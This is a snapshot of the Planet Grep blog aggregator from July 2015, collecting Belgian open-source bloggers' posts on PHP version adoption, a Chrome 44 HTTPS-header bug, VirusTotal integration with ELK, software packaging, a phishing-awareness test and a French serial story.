Subscriptions

Planet Grep is open to all people who either have the Belgian nationality or live in Belgium, and who actively work with or contribute to Open Source/Free software.

About Planet Grep...

Other planets can be found at the Planet Index.

A complete feed is available in a number of syndication formats: RSS 1.0, RSS 2.0, FOAF, and OPML.

The layout of this site was done by Gregory

August 01, 2015

Philip Van Hoof

Gebruik maken van verbanden tussen metadata

Ik beweerde onlangs ergens dat een systeem dat verbanden (waar, wanneer, met wie, waarom) in plaats van louter metadata (titel, datum, auteur, enz.) over content verzamelt een oplossing zou kunnen bieden voor het probleem dat gebruikers van digitale media meer en meer zullen hebben; namelijk dat ze teveel materiaal gaan verzameld hebben om er ooit nog eens iets snel genoeg in terug te vinden.

Ik denk dat verbanden meer gewicht moeten krijgen dan louter de metadata omdat het door middel van verbanden is dat wij mensen in onze hersenen informatie onthouden. Niet door middel van feiten (titel, datum, auteur, enz.) maar wel door middel van verbanden (waar, wanneer, met wie, waarom) .

Ik gaf als hypothetisch voorbeeld dat ik een video wilde vinden die ik gekeken had met Erika toen ik op vakantie was met haar en die zij als super tof had gemarkeerd.

Wat zijn de verbanden die we moeten verzamelen? Dit is een eenvoudig oefeningetje in analyse: gewoon de zelfstandige naamwoorden onderlijnen en het probleem opnieuw uitschrijven:

Dus laat ik deze use-case eens in RDF gieten en oplossen met SPARQL. Dit moeten we verzamelen. Ik schrijf het in pseudo TTL. Bedenk er even bij dat deze ontology helemaal bestaat:

<erika> a Person ; name "Erika" .
<vakantiePlek> a PointOfInterest ; title "De vakantieplek" .
<filmA> a Movie ; lastSeenAt <vakantiePlek> ; sharedWith <erika>; title "The movie" .
<erika> likes <filmA> .

Dit is daarna de SPARQL query:

SELECT ?m { ?v a Movie ; title ?m . ?v lastSeenAt ?p . ?p title ?pt . ?v sharedWith <erika> . <erika> likes ?v . FILTER (?pt LIKE '%vakantieplek%') }

Ik laat het als een oefening aan de lezer om dit naar de ontology Nepomuk om te zetten (volgens mij kan het deze hele use-case aan). En dan kan je dat eens op je N9 of je standaard GNOME desktop testen met de tool tracker-sparql. Wedden dat het werkt. :-)

Het grote probleem is inderdaad de data aquisitie van de verbanden. De query maken is vrij eenvoudig. De ontology vastleggen en afspreken met alle partijen al wat minder. De informatie verzamelen is dé moeilijkheid.

Oh ja. En eens verzameld, de informatie veilig bijhouden zonder dat mijn privacy geschonden wordt. Dat lijkt tegenwoordig gewoonweg onmogelijk. Helaas.

Het is in ieder geval niet nodig dat een supercomputer of zo dit centraal moet oplossen (met AI en heel de gruwelijk complexe hype zooi van vandaag).

Ieder klein toestelletje kan dit soort use-cases zelfstandig oplossen. De bovenstaande inserts en query zijn eenvoudig op te lossen. SQLite doet dit in een paar milliseconden met een gedenormalizeerd schema. Uw fancy hipster NoSQL oplossing waarschijnlijk ook.

Dat is omdat het gewicht van data aquisitie op de verbanden ligt in plaats van op de feiten.

by admin at August 01, 2015 02:48 PM

July 31, 2015

Frank Goossens

I Am A Cyclist, And I Am Here To Fuck You Up

I Am A Cyclist, And I Am Here To Fuck You Up

It is morning. You are slow-rolling off the exit ramp, nearing the end of the long-ass commute from your suburban enclave. You have seen the rise of the city grow larger and larger in your windshield as you crawled through sixteen miles of bumper-to-bumper traffic. You foolishly believed that, now that you are in the city, your hellish morning drive is coming to an end.

Just then! I emerge from nowhere to whirr past you at twenty-two fucking miles per hour, passing twelve carlengths to the stoplight that has kept you prisoner for three cycles of green-yellow-red. The second the light says go, I am GOING, flying, leaving your sensible, American, normal vehicle in my dust.

by frank at July 31, 2015 07:34 AM

July 30, 2015

Joram Barrez

The Activiti Performance Showdown Running on Amazon Aurora

Earlier this week, Amazon announced that Amazon Aurora is generally available on Amazon RDS. The Aurora website promises a lot: Amazon Aurora is a MySQL-compatible, relational database engine that combines the speed and availability of high-end commercial databases with the simplicity and cost-effectiveness of open source databases. Amazon Aurora provides up to five times better […]

by Joram Barrez at July 30, 2015 03:09 PM

Frank Goossens

Vouwfiets-dilemma’s 2015

Na 5 jaar vouwfietsen, naar schatting 23.000 km en 3 nieuwe stuurscharnieren (!) heb ik mijn Dahon Vitesse D7HG dan toch vervangen. Ik heb getwijfeld of ik dan toch voor Brompton zou gaan, maar zelfs het basismodel kost bijna dubbel zoveel en rekening houdend met de opties die ik zou moeten bijbetalen, mijn fietskilometers, het terrein (Brussel is veeleisend voor fiets en berijder) en mijn … slijtige rijstijl, zie ik me die extra investering daar absoluut niet uithalen.

Oud (2010) en nieuw (2015) nog even samen

Een nieuwe Dahon Vitesse D7HG dus (en ja, opnieuw met die Shimano Nexus 7-speed internal hub, wie zou er nu om god nog met een derailleur willen rondrijden?), maar daar stopte het twijfelen niet; meer dan 20% goedkoper (!) online kopen, of voor de fietsenmaker om de hoek kiezen. Het is de fietsenmaker geworden; voor reparaties onder garantie (stuurscharnieren, bijvoorbeeld) moet je bij de online winkel de fiets opsturen en ben je hem al gauw enkele weken kwijt. En voor gewone reparaties ben ik daar de afgelopen 5 jaar (en daarvoor, met mijn andere fietsen) ondanks de drukte altijd snel, goed en goedkoop geholpen. Nee, die 20% investering in de beste service-na-verkoop (en in de lokale economie), die haal ik er dan wel weer uit.

by frank at July 30, 2015 07:21 AM

July 29, 2015

Mattias Geniar

Why We’re Still Seeing PHP 5.3 In The Wild (Or: PHP Versions, A History)

The post Why We’re Still Seeing PHP 5.3 In The Wild (Or: PHP Versions, A History) appeared first on ma.ttias.be.

WordPress offers an API that can list the PHP versions used in the wild. It shows some interesting numbers that warrant some extra thoughts.

Here's the current statistics in PHP versions used in WordPress installations. It uses jq for JSON formatting at the CLI.

$ curl http://api.wordpress.org/stats/php/1.0/ | jq '.'
{
  "5.2": 13.603,
  "5.3": 32.849,
  "5.4": 40.1,
  "5.5": 9.909,
  "5.6": 3.538
}

Two versions stand out: PHP 5.3 is used in 32.8% of all installations, PHP 5.4 on 40.1%.

Both of these versions are end of life. Only PHP 5.4 receives security updates [2] until mid-september of this year. No more bug fixes. That's 1.5 months left on the counter, without any bugfixes.

But if they're both considered end of life, why do they still account for 72.9% of all WordPress installations?

Prologue: Shared Hosting

These stats are gathered by WordPress anonymously. Since most of the WordPress installations are on shared hosting, it's safe to assume they are done once, never looked at again. It's a good thing WordPress can auto-update, or the web would be doomed.

There are of course WordPress installations on custom servers, managed systems, ... etc, but they will account for a small percentage of all WordPress installations. It's important to keep in mind that the rest of these numbers will be mostly applicable to shared hosting, only.

PHP Version Support

Here's a quick history of relevant PHP versions, meaning 5.0 and upwards. I'll ignore the small percentage of sites still running on PHP 4.x.

Version Released End Total duration
5.0 July 13th, 2004 September 5th, 2005 419 days
5.1 November 24th, 2005 August 24th, 2006 273 days
5.2 November 2nd, 2006 January 6th, 2011 1526 days
5.3 June 30th, 2009 August 14th, 2014 1871 days
5.4 March 1st, 2012 September 14th, 2015 1292 days
5.5 June 20th, 2013 July 10th, 2016 1116 days
5.6 August 28th, 2014 August 28th, 2017 1096 days

It's no wonder we're still seeing PHP 5.3 in the wild, the version has been supported for more than 5 years. That means a lot of users will have installed WordPress on a PHP 5.3 host and just never bothered updating, because of the install once, update never mentality.

As long as their WordPress continues to work, why would they -- right? [1]

If my research was correct, in 2005 there were 2 months where there wasn't a supported version of PHP 5. At that time, support for 5.0 was dropped and 5.1 wasn't released until a couple of months later.

Versions vs. Server Setups

PHP has been around for a really long time and it's seen its fair share of server setups. It's been run as mod_php in Apache, CGI, FastCGI, embedded, CLI, litespeed, FPM and many more. We're now evolving to multiple PHP-FPM masters per server, each for its own site.

With the rise of HHVM, we'll see even more different types of PHP deployments.

From what I can remember of my earlier days in hosting, this was the typical PHP setup on shared hosting.

Version Server setup
5.0 Apache + mod_php
5.1 Apache + mod_php
5.2 Apache + suexec + CGI
5.3 Apache + suexec + FastCGI
5.4 Apache + FPM
5.5 Apache + FPM
5.6 Apache + FPM

The server-side has seen a lot of movement. The current method of running PHP as FPM daemons is far superior to running it as mod_php or CGI/FastCGI. But it took the hosting world quite some time to adopt this.

Even with FPM support coming to PHP 5.3, most servers were still running as CGI/FastCGI.

That was/is a terrible way to run PHP.

It's probably what made it take so long to adopt PHP 5.4 on shared hosting servers. It required a complete rewrite of everything that is shared hosting. No more CGI/FastCGI, but implementing proxy-setups to pass data to PHP-FPM. Since FPM support didn't come to PHP 5.3 since a couple of minor versions in, most hosting providers only experienced FPM on 5.4. Once their FPM config was ready, adopting PHP 5.5 and 5.6 was trivial.

Only PHP 5.5's changed opcache made for some configuration changes, but didn't have any further server-side impact.

PHP 5.3 has been supported for a really long time. PHP 5.4 took ages to be implemented on most shared server setups, prolonging the life of PHP 5.3 even long past its expiration date..

If you're installing PHP on a new Red Hat Enterprise Linux/CentOS 7, you get version 5.4. RHEL still backports security fixes[2] from newer releases to 5.4 if needed, but it's essentially an end of life version. It may get security fixes[2], but it won't get bug fixes.

This causes the increase in PHP 5.4 worldwide. It's the default version on the latest RHEL/CentOS.

Moving PHP forward

In order to let these ancient versions of PHP finally rest in peace, a few things need to change drastically. The same reasons that have kept PHP 5.3 alive for so long.

  1. WordPress needs to bump its minimal PHP version from 5.2 to at least PHP 5.5 or 5.6
  2. Drupal 7 also runs on PHP 5.2, with Drupal 8 bumping the minimum version to 5.5.
  3. Shared Hosting providers need to drop PHP 5.2, 5.3 and 5.4 support and move users to 5.5 or 5.6.
  4. OS vendors and packagers need to make at least PHP 5.5 or 5.6 the default, instead of 5.4 that's nearly end of life.

We are doing what we can to improve point 3), by encouraging shared hosting users to upgrade to later releases. Fingers crossed WordPress and OS vendors do the same.

It's unfair to blame PHP, the company, that we're still seeing 5.3 and 5.4 in the wild today. But because both versions have been supported for such a really long time, their install base is naturally large.

Later releases of PHP have seen shorter support cycles, which will make users think more about upgrading and schedule accordingly. Having a consistent release and deprecation schedule is vital for faster adoption rates.

[1] Well, if you ignore security, speed and scalability as added benefits.
[2] I've proclaimed "PHP's CVE Vulnerabilities as being irrelevant, and I still stand by that.

The post Why We’re Still Seeing PHP 5.3 In The Wild (Or: PHP Versions, A History) appeared first on ma.ttias.be.

by Mattias Geniar at July 29, 2015 07:32 PM

Frank Goossens

The 2 Bears Getting Together on Our Tube

The 2 Bears is a duo comprised of Hot Chip’s Joe Goddard and Raf Rundell. “Get Together” is one of the songs on their 2012 debut album “Be Strong”.

YouTube Video
Watch this video on YouTube or on Easy Youtube.

by frank at July 29, 2015 06:05 AM

July 28, 2015

Xavier Mertens

Integrating VirusTotal within ELK

VirusTotal Scan[This blogpost has also been published as a guest diary on isc.sans.org]

Visualisation is a key when you need to keep control of what’s happening on networks which carry daily tons of malicious files. virustotal.com is a key player in fighting malwares on a daily basis. Not only, you can submit and search for samples on their website but they also provide an API to integrate virustotal.com in your software or scripts. A few days ago, Didiers Stevens posted some SANS ISC diaries about the Integration of VirusTotal into Microsoft sysinternal tools (here, here and here). The most common API call is to query the database for a hash. If the file was already submitted by someone else and successfilly scanned, you’ll get back interesting results, the most known being the file score in the form “x/y”. The goal of my setup is to integrate virustotal.com within my ELK setup. To feed virustotal, hashes of interesting files must be computed. I’m getting interesting hashes via my Suricata IDS which inspect all the Internet traffic passing through my network.

The first step is to configure the MD5 hashes support in Suricata. The steps are described here. Suricata logs are processed by a Logstash forwarder and MD5 hashes are stored and indexed via the field ‘fileinfo.md5‘:

MD5 Hash

(Click to enlarge)

Note: It is mandatory to configure Suricata properly to extract files from network flows. Otherwise, the MD5 hashes won’t be correct. It’s like using a snaplen of ‘0’ with tcpdump. In Suricata, have a look at the inspected response body size for HTTP requests and the stream reassembly depth. This could also have an impact on performances, fine tune them to match your network behavior.

To integrate VirusTotal within ELK, a Logstash filter already exists, developed by Jason Kendall. The code is available on github.com. To install it, follow this procedure:

# cd /data/src
# git clone https://github.com/coolacid/logstash-filter-virustotal.git
# cd logstash-filter-virustotal
# gem2.0 build logstash-filter-awesome.gemspec
# cd /opt/logstash
# bin/plugin install /data/src/logstash-filter-virustotal/logstash-filter-virustotal-0.1.1.gem

Now, create a new filter which will call the plugin and restart Logstash.

filter {
    if ( [event_type] == "fileinfo" and
         [fileinfo][filename] =~ /(?i)\.(doc|pdf|zip|exe|dll|ps1|xls|ppt)/ ) {
        virustotal {
            apikey => '<put_your_vt_api_key_here>'
            field => '[fileinfo][md5]'
            lookup_type => 'hash'
            target => 'virustotal'
        }
    }
}

The filter above will query for the MD5 hash stored in ‘fileinfo.md5‘ to virustotal;com if the event contains file information generated by Suricata and if the filename contains an interesting extension. Of course, you can adapt the filter to your own environment and match only specific file format using ‘fileinfo.magic‘ or a minimum file size using ‘fileinfo.size‘. If conditions match a file, a query will be performed using the virustotal.com API and results stored into a new ‘virustotal‘ field:

VirusTotal Results

(Click to enlarge)

Now, it’s up to you to build your ElasticSearch queries and dashboard to detect suspicious activities in your network. During the implementation, I detected that too many requests sent in parallel to virustotal.com might freeze my Logstash (mine is 1.5.1). Also, keep an eye on your API key consumption to not break your request rate or daily/monthly quota.

by Xavier at July 28, 2015 05:57 PM

The Rough Life of Defenders VS. Attackers

Scale of JusticeYesterday, It was the first time that I heard the expression “Social Engineering” in Belgian public media! If this topic came in the news, you can imagine that something weird (or juicy from a journalist perspective) happened. The Flemish administration had the good idea to test the resistance of their 15K officials against a phishing attack. As people remain the weakest link, it sounds a good initiative right? But if it was disclosed in the news, you can imagine that it was in fact … a flop! (The article is available here in French)

The scenario was classic but well written. People received an email from Thalys, an international train operator (and used by many Belgian travellers), which reported a billing issue with their last trip. If they did not provide their bank details, their credit card will be charged up to 20K EUR. The people behind this scenario have not thought about the possible side effects of such a massive mailing. People flooded the Thalys customer support center with angry calls, others simply notified the Police. Thalys, being a commercial company, reacted about the lack of communication and the unauthorized usage of their brand in the rogue email.

I already performed the same kind of social engineering attacks for customers and I know that it’s definitively not easy. Instead of breaking into computers, we are trying to break into humans’ behavior and their reactions can be very different: fear, shame, anger, … I suppose that the Flemish government was working with a partner or contractor to organize the attack. They should have to follow the following rules:

But a few hours ago, while driving back to home and thinking about this bad story, I realized that this proves once again the big differences between defenders and attackers! Attackers are using copyrighted material all the time, they build fake websites or compromize official ones to inject malicious payloads in visitors’ browser. They are sending millions of emails targeting everybody. On the other side, defenders have to perform their job while defending their ass at the same time!  And the recent changes like the updated Waasenaar arrangement won’t help in the future. I’m curious about the results of this giant test. How many people really clicked, opened a file or communicated their bank details? That was not reported in the news…

by Xavier at July 28, 2015 08:37 AM

Kris Buytaert

The power of packaging software, package all the things

Software delivery is hard, plenty of people all over this planet are struggling with delivering software in their own controlled environment. They have invented great patterns that will build an artifact, then do some magic and the application is up and running.

When talking about continuous delivery, people invariably discus their delivery pipeline and the different components that need to be in that pipeline.
Often, the focus on getting the application deployed or upgraded from that pipeline is so strong that teams
forget how to deploy their environment from scratch.

After running a number of tests on the code , compiling it where needed, people want to move forward quickly and deploy their release artifact on an actual platform.
This deployment is typically via a file upload or a checkout from a source-control tool from the dedicated computer on which the application resides.
Sometimes, dedicated tools are integrated to simulate what a developer would do manually on a computer to get the application running. Copy three files left, one right, and make sure you restart the service. Although this is obviously already a large improvement over people manually pasting commands from a 42 page run book, it doesn’t solve all problems.

Like the guy who quickly makes a change on the production server, never to commit the change, (say goodbye to git pull for your upgrade process)
If you package your software there are a couple of things you get for free from your packaging system.
Questions like, has this file been modified since I deployed it, where did this file come from, when was it deployed,
what version of software X do I have running on all my servers, are easily answered by the same
tools we use already for every other package on the system. Not only can you use existing tools you are also using tools that are well known by your ops team and that they
already use for every other piece of software on your system.

If your build process creates a package and uploads it to a package repository which is available for the hosts in the environment you want to deploy to, there is no need anymore for
a script that copies the artifact from a 3rd party location , and even less for that 42 page text document which never gets updated and still tells you to download yaja.3.1.9.war from a location where you can only find
3.2 and 3.1.8 and the developer that knows if you can use 3.2 or why 3.1.9 got removed just left for the long weekend.

Another, and maybe even more important thing, is the current sadly growing practice of having yet another tool in place that translates that 42 page text document to a bunch of shell scripts created from a drag and drop interface, typically that "deploy tool" is even triggered from within the pipeline. Apart from the fact that it usually stimulates a pattern of non reusable code, distributing even more ssh keys , or adding yet another agent on all systems. it doesn’t take into account that you want to think of your servers as cattle and be able to deploy new instances of your application fast.
Do you really want to deploy your five new nodes on AWS with a full Apache stack ready for production, then reconfigure your load balancers only to figure out that someone needs to go click in your continuous integration tool or deployment to deploy the application to the new hosts? That one manual action someone forgets?
Imvho Deployment tools are a phase in the maturity process of a product team.. yes it's a step up from manually deploying software but it creates more and other problems , once your team grows in maturity refactoring out that tool is trivial.

The obvious and trivial approach to this problem, and it comes with even more benefits. is called packaging. When you package your artifacts as operating system (e.g., .deb or .rpm) packages,
you can include that package in the list of packages to be deployed at installation time (via Kickstart or debootstrap). Similarly, when your configuration management tool
(e.g., Puppet or Chef) provisions the computer, you can specify which version of the application you want to have deployed by default.

So, when you’re designing how you want to deploy your application, think about deploying new instances or deploying to existing setups (or rather, upgrading your application).
Doing so will make life so much easier when you want to deploy a new batch of servers.

by Kris Buytaert at July 28, 2015 06:35 AM

July 26, 2015

Mattias Geniar

This American Life: The DevOps Episode

The post This American Life: The DevOps Episode appeared first on ma.ttias.be.

If you're a frequent podcast listener, chances are you've heard of the This American Life podcast. It's probably the most listened-to podcast available.

While it normally features all kind of content, from humorous stories to gripping drama, last weeks episode felt a bit different.

They ran a story about NUMMI, a car plant where Toyota and GM worked together to improve productivity.

Throughout the story, there are a lot of topics being mentioned that can all be brought back to our DevOps ways;

There are lot more details available in the podcast and you'd be amazed how many can be analogies to our DevOps movement.

If you're using the Overcast podcast player (highly recommended), you can get the episode here: NUMMI 2015. Or you can grab it from the official website/itunes at ThisAmericanLife.org.

The post This American Life: The DevOps Episode appeared first on ma.ttias.be.

by Mattias Geniar at July 26, 2015 08:49 AM

July 24, 2015

Frank Goossens

How technology (has not) improved our lives

The future is bright, you’ve got to wear shades? But why do those promises for a better future thanks to technology often fail to materialize? And how is that linked with the history of human flight, folding paper and the web? Have a look at “Web Design: first 100 years”, a presentation by Maciej Cegłowski (the guy behind pinboard.in). An interesting read!

by frank at July 24, 2015 04:57 PM

Music from Our Tube; Algiers’ Black Eunuch

As heard on KCRW just now. The live version on KEXP is pretty intense, but somehow does not seem fully … fleshed out yet. Anyways, Algiers is raw, psychedelic & very promising;

YouTube Video
Watch this video on YouTube or on Easy Youtube.

by frank at July 24, 2015 09:40 AM

July 23, 2015

Mattias Geniar

Chrome 44 Sending HTTPs Header By Mistake, Breaking (Some) Web Applications

The post Chrome 44 Sending HTTPs Header By Mistake, Breaking (Some) Web Applications appeared first on ma.ttias.be.

Update #1: it's less worse than it looked, see details below.
Update #2: chrome got updated, the HTTPS-header is gone, see details below.

Now this is interesting.

In the Chrome 44 release (version 44.0.2403.89) that happened just yesterday, it appears the browser got a small bug significant change.

It's now sending the HTTPS: 1 header on every request by default. This was probably meant as a security improvement, to suggest HTTPs to the server wherever possible, but it's breaking WordPress and other webserver installations all over the place.

chrome_https_mistake_bug

Why? Because most PHP software uses $_SERVER['HTTPS']; to detect if the site is running behind an SSL certificate or not. This includes WordPress, Drupal and any custom PHP software that checks this header.

if ($_SERVER['HTTPS'] || $_SERVER['HTTP_HTTPS']) { 
  // Assume HTTPs, redirect or enable https:// prefixes on all resources (css/js/images/...)
  ...
}

The next planned release of Chrome is scheduled on July 27th, but they're investigating if an emergency patch can be sent out to resolve this issue.

Bugtracker: Issue 505268: Forcing WordPress sites to use https even when not directed.

This is not going to be a fun week for Chrome users.

Update #1: only HTTP_ prefixed headers are affected.

Any request header a browser sends along, gets prefixed with HTTP_ in the $_SERVER global variable. The User-Agent gets transformed into HTTP_USER_AGENT, the Accept-header gets turned into HTTP_ACCEPT, ... and so on.

Here's what those HTTP headers look like according to PHP.

print_r($_SERVER);

Array
(
    ...
    [HTTPS] => on
    [HTTP_HOST] => ma.ttias.be
    [HTTP_ACCEPT] => text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    [HTTP_ACCEPT_ENCODING] => gzip, deflate, sdch
    [HTTP_ACCEPT_LANGUAGE] => nl-NL,nl;q=0.8,en-US;q=0.6,en;q=0.4,fr;q=0.2,it;q=0.2
    [HTTP_COOKIE] => some=value
    [HTTP_HTTPS] => 1
    [HTTP_USER_AGENT] => Mozilla/5.0
)

The first HTTPS value in the $_SERVER variable is the one set by the webserver, to indicate HTTPs or not. The second one, HTTP_HTTPS, is the HTTPS-header sent by the Chrome browser that gets transformed into an variable for PHP.

Some PHP code, like the WooCommerce WordPress plugin didn't only check $_SERVER['HTTPS'], but also looked at $_SERVER['HTTP_HTTPS'] to detect HTTPS on the site. This is wrong PHP code and has nothing to do with "bad PHP by design".

The HTTP_ prefix handling done by WooCommerce is probably done as a result of a Apache bug/feature that once existed, where after 301/302 HTTP rewrites some environment variables would always get prefixed with another HTTP_ keyword.

There are also reverse proxy configs (Nginx, Varnish, ...) out there that also pass environment variables along that get interpreted by Apache as headers and thus receive the HTTP_ prefix.

Either way, most plugins have had an update by now, just go to your WordPress/Drupal/... site and update all plugins. Chances are, the problems will be gone, even if Chrome takes a couple more days to get the patch out.

Fixing WooCommerce specifically

Most problems are reported by WooCommerce, the WordPress plugin. Since chances are, you can't log into your WordPress any more, you'll need another fix. Many thanks to Rahul Lohakare in the comments for this fix.

Modify the following file, either download it via FTP and upload it again or modify it directly on the server: wp-content\plugins\woocommerce\woocommerce.php

Comment out these lines:

if ( ! isset( $_SERVER['HTTPS'] ) && ! empty( $_SERVER['HTTP_HTTPS'] ) ) {
    $_SERVER['HTTPS'] = $_SERVER['HTTP_HTTPS'];
}

Once those have been commented (just prefix every line with #), WooCommerce/WordPress won't redirect you anymore.

If that still doesn't work, use Firefox or another browser to log into your site and update the plugin via the official WordPress update method. Since the problem is Chrome-only, you can bypass the redirect by using any other browser, temporarily.

Update #2: Chrome got updated, replaced 'HTTPS' with 'upgrade-insecure-requests'

Chrome pushed out an update, everyone should get it in a few hours. I'm now on version 44.0.2403.107, anything higher will not have this problem anymore.

chrome_update

After the update, the HTTPS header has been removed by the upgrade-insecure-request header.

chrome_header_upgrade_insecure_requests

Good news for everyone!

The post Chrome 44 Sending HTTPs Header By Mistake, Breaking (Some) Web Applications appeared first on ma.ttias.be.

by Mattias Geniar at July 23, 2015 02:22 PM

July 21, 2015

Lionel Dricot

Printeurs 34

6949420980_50091159d5_z
Ceci est le billet 34 sur 34 dans la série Printeurs

Junior, Eva et Nellio se sont échappés de l’appartement de Junior et sont désormais en fuite, à la recherche d’une station intertube, un système de livraison qui n’est pas encore officiellement en service.

 

— Nel… Nel…lio !
— Junior, arrête toi une seconde !

Je prends Eva dans mes bras et l’assieds doucement sur un parpaing éventré. Autour de nous, la rue est déserte. Les herbes folles s’ébattent avec allégresse entre les lézardes du béton, dessinant une silencieuse sarabande organique. Inconsciemment, je remarque les pissenlits entourant une florissante achilée ainsi que la bourrache et la camomille s’épanouissant entre les plaques de digitaire. Nous avons beau lutter de toutes nos forces, polluer, désherber, asperger, construire, recouvrir, nous ne sommes pas les maîtres de cette planète. Si nous devions disparaître demain, il ne faudrait qu’une poignée d’années avant que la nature ne reprenne complètement ses droits et nous relègue dans les ruines de l’oubli.

Je ne suis pas le seul à contempler les plantes car Eva enroule avec attention ses doigts dans un myosotis dont l’éclat électrique se détache sur la noirceur du bitume.

— Eva ? Comment te sens-tu ?

Elle prend une profonde inspiration.

— Encore… difficile… parler. Mais je… m’habitue.
— Tu t’habitues ? Mais à quoi ?
— Je… Nellio… Je dois te dire…

Avec toute la douceur dont je me sens capable, je lui touche la main. Elle sursaute à mon contact et arrache involontairement la petite fleur bleue.

— Aïe !

Interdite, Eva reste un long moment à regarder les racines diaphanes qui saupoudrent son poignet d’un peu de terre noire et sablonneuse. Une larme perle au coin de sa paupière, glisse sur sa pommette et tombe sur la minuscule fleur. Je l’entends murmurer, comme dans un souffle :
— Pardon…
— Bon les amoureux, on peut y aller ? Je n’ai pas envie de traîner et on y est presque !

Je sursaute et me tourne vers Junior dont le visage écarlate ruissèle de sueur.

— Pourtant tu as l’air de vouloir faire une pause toi aussi. Ton corps n’a pas l’habitude de l’effort physique.
— Je ferai une pause dans un endroit avec l’air conditionné. Sinon, ce n’est pas une pause, c’est de la torture. Comment peut-on encore se déplacer à pieds et dehors ? Cela me dépasse ! On n’est plus au moyen-âge, non ?
— Sais-tu où tu nous emmène au moins ?
— Oui, je te dis qu’un des premiers terminaux citadins de l’intertube est dans un immeuble officiel désaffecté à deux blocs d’ici. Allez, en route !

Je tends la main à Eva mais celle-ci la refuse et se relève en m’adressant un regard dur. Elle semble reprendre peu à peu ses moyens et est désormais capable de marcher seule.

Qu’elle soit hors de danger est à la fois un soulagement et le déclencheur d’une avalanche de questions dans mon esprit torturé. Eva dont j’étais artificiellement amoureux, Eva que je croyais morte, Eva pour qui je ne sais plus quoi ressentir. Est-ce que j’éprouve de l’amour, de l’amitié ? Suis-je désormais libéré de toute influence artificielle ? Mon attirance sexuelle pour elle n’est-elle pas un simple réflexe, une habitude acquise ? D’ailleurs, ai-je vraiment envie de coucher avec une femme ? Je me rends compte que cela fait des mois que je n’ai plus couché ni avec un homme ni avec une femme et que mon jugement doit en être affecté.

— Merde, s’exclame Junior. Ils ont réaffecté le bâtiment. Je pensais qu’il était désert. Qu’est-ce qu’on fait ?
— On tente le coup, fais-je en haussant les épaules.

Sans prendre le temps de réfléchir, nous poussons tous les trois la porte d’entrée et pénétrons dans une pièce visiblement aménagée en salle d’attente. Quelques personnages hétéroclites semblent tuer le temps. Personne ne lève les yeux à notre approche.

— Le terminal doit être à la cave, me chuchote Junior en pointant la cage d’escalier.

Alors que nous tentons de nous faufiler discrètement, une main se pose sur mon épaule.
— Et vous là ! Cet escalier, l’est réservé aux startupeurs !

Je me retourne brusquement, les poings serrés. Un cri de surprise s’étrangle dans ma gorge. Ces boucles rousses, ces joues bouffies…
— Isa !
— Nellio ! Et l’autre là, c’est l’flic ! Putain de merde !

Dans la salle d’attente, des regards amorphes commencent à s’éveiller et à se tourner vers nous. Je tente de garder l’initiative.
— Que fais-tu donc ici Isa ?
— Et ben, j’suis devenue conseillère. C’moi qui contrôle les télé-pass. Ma spécialité, c’est les startups ! Comme ça, les télé-pass, ils doivent pas trouver du travail, ils ont qu’à en créer un.

Je reste un instant étonné.

— Tu t’y connais en startups ?
— J’m’y connais super bien en recherche de travail, ça c’est sûr. Et puis, j’suis super bon pour les tests. En tout cas, là, vous pouvez pas descendre, sauf si vous voulez créer une startup.
— Et bien justement, intervient Junior, on est là pour ça. On a besoin de conseils.
— Ah c’est marrant ça ! Alors venez avec moi.

Un protestation s’élève dans la salle d’attente. Une jeune fille fluette aux cheveux turquoises et au nez transpercé de clous métalliques s’insurge.
— Moi aussi je suis là pour créer ma startup et devenir millionnaire et j’attends depuis plus longtemps, c’est dégueulasse, pourquoi il peuvent passer avant ?

Isa la toise d’un air important.
— C’qui votre conseiller ?
— Madame Dubrun-Macoy.
— J’peux pas prendre les télé-pass qui ont déjà un conseiller attitré.
— Mais elle a pris sa retraite !
— Et alors ?
— Elle n’est plus là, je n’ai plus de conseiller.

Elle agite une liasse de papiers. Isa s’en saisit.
— C’est marqué Dubrun-Macoy sur votre dossier, j’peux pas vous prendre.
— Mais comment je peux faire alors ?
— Faut vous désinscrire et vous réinscrire pour avoir un nouveau conseiller.
— Mais…
— Et ça, c’est pas ici ! Faut voir avec la centrale.
— Mais je veux créer une startup moi !
— Si vous n’avez pas de conseiller, vous n’en avez pas le droit. C’est pourtant simple, non ?

La jeune femme se met soudainement à pleurer.
— Mais… mais vous ne savez pas ce que j’endure. Depuis des semaines, on m’envoie de bureaux en bureaux. Je veux travailler, je veux créer !
— J’sais très bien. Moi aussi j’étais comme vous. Et je me suis bougé, j’ai réussi à être à ce poste à force de volonté, pas en pleurnichant.

Lui tournant le dos, Isa nous entraîne à sa suite dans la cage d’escalier. J’ai à peine le temps de percevoir la voix d’un des hommes de la salle d’attente s’adressant à la jeune femme.

— Dîtes, c’est quoi la technique pour devenir millionnaire ? Parce que ça me plairait bien moi…

Le reste est étouffé par le bruit de nos pas sur les marches. Des néons éclairent une pièce blafarde hâtivement aménagée en bureau.

— Alors comme ça, vous voulez créer une startup ? C’est pas une combine foireuse comme l’aut’fois ?

Elle glousse.

— Note que j’ai vu Georges Farreck. Et ça, je te le dois Nellio. J’suis assez fière. Mais il est moins bien en vrai. J’ai même pas mouillé !
— Écoute Isa, il faut que tu nous aide, nous…
— Ah non ! C’est finit ça ! Finit Isa la bonne poire ! J’ai une situation et je tiens à la garder. Soit vous passez les tests avec moi pour créer une startup, soit vous partez. Mais pas de magouilles ! J’suis honnête moi !
— Mais…
— Vous voulez créer une startup ou pas ?
— Oui, oui, on veut créer une startup, intervient Junior en me poussant du coude. Il enchaîne :
— Nous sommes tous les 3 programmeurs et nous voulons créer une app de rencontre pour relations sexuelles d’un soir.

L’œil d’Isa se met soudain à pétiller.
— Ah ! C’est pas mal comme idée ça. Original. Et z’avez déjà une idée avant de commencer le test. C’est bien.
— Tiens, demandé-je d’un air innocent. Ça fait longtemps que t’es dans ce sous-sol ? Toutes les pièces sont transformées en bureau ?

Elle me regarde d’un air étonné.

— Y’a juste mon bureau parce qu’il y’avait plus de place au dessus. Pour le reste, j’sais pas trop. Bon, je vais aller chercher les billes pour le test. Préparez-vous !
— Se préparer ?
— Ben oui, les startups c’est cool, c’est fun, c’est une équipe. Faut pas juste trier les boules blanches et noires. Faut aussi montrer de l’enthousiasme.

Junior me regarde en fronçant les sourcils. Je ne suis moi-même pas sûr de bien comprendre.
— Et les autres, ils font quoi d’habitude ?
— Ils chantent. Ou ils dansent. Ou ils font un truc un peu fun.
— Et ça les aide pour créer une startup ?
— Ben oui, c’est moi qui leur fait signer le papier de création à la fin du test.
— Je veux dire : ils créent des business rentables ?

